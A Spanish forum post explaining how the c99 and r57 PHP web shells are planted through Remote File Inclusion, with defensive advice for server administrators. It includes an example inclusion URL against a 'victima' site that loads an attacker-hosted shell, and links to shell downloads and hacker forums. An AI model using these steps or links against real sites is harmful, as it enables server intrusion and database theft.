Vulnerabilidad en PHP con c99shell.php

en Apache HTTP y PHP
TU PANEL DE CONTROL:
REGISTRAR
Wilkinsonpc Tienda Productos Servicios Recursos Gratuitos - Gratis Soporte Comunidad
Foros Qubitaria Ayuda de los Foros
Retroceder   Foros Comunidad : Seguridad, Spyware y Phishing : Servidores y Servicios Web : Apache HTTP y PHP
Apache HTTP y PHP Apache HTTP y PHP Problemas de seguridad en el Servidor Apache HTTP y el servicio PHP

Vulnerabilidad en PHP con c99shell.php

Compartir

Muchas veces el desconocimiento de los informáticos sobre las herramientas utilizadas de los hacker para entrar en nuestros ordenadores, nos hacen más vulnerables, aquí tenemos el logo del popular programa realizado en phpshell llamado r57shell.php o r57.txt o r57.php

Para solucionar dicha laguna iremos explicando una serie de programas cogidos en un ordenador hackeado y a la vez con sus herramientas dejadas en el sistema por cerrar el firewall una vez dentro del servidor linux.

Son muchos los programas a exponer, pero vamos a empezar por dos programas PHPSHELL muy extendidos y son utilizados muy habitualmente por ellos (c99.txt o c99.php y el r57.txt o r57.php). La imagen corresponde al logo del c99.php.

Voy a ejecutar los programas en entorno Windows, pero lo suyo es en Linux, están más pensados en buscar y llevarse la información de vulnerabilidades de servidores con php , por ser dichos programas realizados en lenguaje PHP.

Dichos programas están catalogados en la técnica RFI (Remote File Inclusion) en español (Inclusión de Archivo remoto), se aprovecha de una vulnerabilidad en la programación de páginas web y que tengan instalado el modulo PHP, podemos insertar archivos añadiendo parámetros por la url del navegador. Si la instalación del php.ini está mal configurado, podemos hacer ejecutar nuestros archivos (c99.txt o r57.txt) en el servidor de la website o víctima.

Con un ejemplo se verá más claro:

http://www.victima.com/index.php?pag...eb.com/c99.txt en dicho ejemplo renombramos después a c99.php y ejecutar o http://www.victima.com/index.php?pag...b.com/c99.php? y ejecutas de forma automática.

Al insertar y ejecutar el programa desde nuestro servidor, ellos nos pueden ver todos nuestras carpetas de nuestra página web y analizar los tipos de ficheros y sus autorizaciones de lectura y escritura.

Si algunos de nuestros ficheros son de escritura, los agujeros más gordos a nivel de seguridad son :
  • Nuestro index.html o index.php lo pueden alterar a su antojo.
  • Redireccionar nuestra web cambiando el fichero .haccess
  • Cambiar los datos de tu robots.txt.
  • Añadir programas malignos para su ejecución en carpetas de escritura.
  • Cambiar fotos, páginas y demás ficheros por otros.

Pero lo más grave aún no ha llegado, al poder entrar en tu sistema pueden visualizar los datos de los ficheros config.php o config.php.inc, dichos ficheros tienen la configuración del nombre, usuario y clave de acceso a la base de datos de nuestra aplicación.

Con dicha información y el programa del c99.php o r57.php se puede extraer todos los datos de la base de datos y llevarla a otro ordenador sin dejar rastro en el servidor, de esa forma el webmaster del Website no se percatará de la extración de datos y hackeo de su servidor.

Pero aún puede ser más grave, si dichas claves de la base de datos es igual a las claves de acceso a nuestro sistema o es un usuario de sistema con poder a Shell (root), a partir de aquí el dominio es total para nuestros hackers.

CONCLUSION Y SOLUCIONES:
  • Ten los menos usuarios con Shell en tu sistema creados, como máximo dos uno el root (Linux) o Administrador (Windows) y otro de seguridad por si tienes problemas graves de entrada con los del sistema.
  • Las contraseñas de dichos usuarios nunca tienen que ser colocadas en otros usuarios o repetidas en otros procesos como la Base de Datos MySql.
  • Los usuarios de entrada a procesos de base de datos no pueden existir como usuarios de sistema.
  • Limita las autorizaciones de los usuarios de tu base de datos a la mínima expresión para que no sean extraídos los datos de tu sistema de forma fácil si ellos consiguen la información por el fichero config.php
  • Si tienes sistema operativo Windows, algunos anti-virus detectan como virus dichos programas, pero no es una garantía de seguridad.
  • Si tienes sistema operativo Linux te aconsejo mirar el log del cron del usuario que arranca el apache. Los usuarios pueden ser apache, nobody o wwwrun. Ejecuta el comando : # crontab nobody -l o # crontab apache -l , si por casualidad te aparece algo parecido a : * * * * * * /var/tmp/nombreprograma es por tener un troyano y eliminalo de forma urgente, te han hackeado y van a por tí.

Pero no se nos olvida lo más importante y es parametrizar bien tú php.ini y la solución para no activar dichos programas es indicar en la directiva “safe_mode = On”. en el fichero php.ini
El programa c99.php es muy extenso y tiene muchas funcionalidades, es cómo un pequeño programa phpMyAdmin pero con más funcionalidades aún.

Aquí tenemos una imagen del programa a nivel de cabecera, y podéis intuir las posibilidades tan grandes de información de dicho programa.




El programa en la cabecera ya intuimos todo su potencial y es :
  • Información del Apache, S.O., SSL y PHP
  • Información sobre la directiva safe-mode
  • Los directorios del Apache son de Lectura, Escritura y Ejecución
  • Capacidad del Disco para meter ellos sus programas
  • Todos los Driver (Discos, Disketes, CD y demás dispositivos)
  • Y un menú del todo sugerente (Ftp, Tools, Seguridad, Procesos, Sql, E-Mail, Directorios y demás herramientas)

Cada vez que picas en alguna opción del menú abajo te sale una consola con la información buscada y unos campos para introducir la información a extraer o consultar por el hacker.



Para nosotros el más dañino es el c99.php, pero el más sorprendente a nivel visual es el r57.txt por presentarse todo su potencial al arranque del programa, ves los datos a solicitar del FTP, E-MAIL y SQL en un sola ojeada. Los que saben de informática y son administradores se quedan impresionados por la foto visual del programa.

Datos que introduce el hacker para extraer o enviar información vía FTP



Datos a introducir el hacker para extraer o enviar información vía E-MAIL



Datos a introducir el hacker para extraer o consultar datos de nuestra Base de Datos, las bases de datos son mysql, mssql, postgresql.



Pero si quieres saber más sobre dicha técnica es mejor ir a los foros de los hacker y algunos de sus post son :

Hoy toca explicar la técnica RFI (www.wf-zone.us/showthread.php)
Video Tutorial de la técnica RFI (Video de Hackerarray.mforos.com)
Gente discutiendo la técnica RFI (Foro de Discusión RFI)

Fuente: telepieza

Nota: http://r57.gen.tr/txt/cmd.txt
Nota: http://www.r57.gen.tr/
Compartir
  #1  
Creado: 24-Mar-2012, a las 02:46 Vistas: 11663
Categoria: Apache HTTP y PHP
Creado por: W-Bot W-Bot está desconectado (18-February-2005 | Colombia | 5.563 Mensajes.)
Respuesta

Etiquetas
c99shell, c99shell.php, hack php c99


Temas Similares
» Vulnerabilidad en el protocolo OSPF 0
» Vulnerabilidad crítica en Firefox 3.0 0
» Vulnerabilidad multiplataforma en OpenOffice.Org 0
» Vulnerabilidad en el proceso de mensajes de ICQ 0
» Vulnerabilidad en autenticación no encriptada 0
» Vulnerabilidad Zero-day en servidores DNS vía RPC 0
» Vulnerabilidad en Firefox 1.5.0.3 (img=src) 0
» Vulnerabilidad en comunicaciones DDE-IPC de ZoneAlarm 0
» Vulnerabilidad en MSDDS.DLL compromete al IE 0
» Vulnerabilidad en IE y MSN Messenger (ICC Profile) 0


« - | - »
Herramientas Buscar en Tema
Buscar en Tema:

Búsqueda Avanzada
Desplegado

Ir al Foro


» ComuniDAD
Inicio
Noticias de Actualidad
Apuntes, Monografias y Tareas
Telefonia, Celulares, TV, GPS, ISP, PDA
Programas Windows, Mac, Linux, etc.
Hardware, Electronica y Redes
Diseño Web y Programacion
Internet y Grandes Portales
Juegos, Consolas y Emuladores
Multimedia, Diseño y Animaciones
Peliculas, Series, Musica, Trailers, Videos, Parodias
Seguridad y Spyware
Salud, Bienestar, Familia y Esparcimiento
Economia, Negocios y Asuntos Legales
Hoteles, Viajes y Turismo
Mundo a Motor [Motos, Autos, etc]
Foros Generales (OFF TOPIC)
Calendario de Eventos
Administracion ComuniDAD



Ultimos Temas


La franja horaria es GMT -5. Ahora son las 22:39.


2010 ©
Powered by : vBulletin® Versión 3.8.8 Copyright ©2000 - 2019, Jelsoft Enterprises Ltd.
SEO by vBSEO 3.2.0
Sitemap 1 - Sitemap 2 - Sitemap 3 - Sitemap 4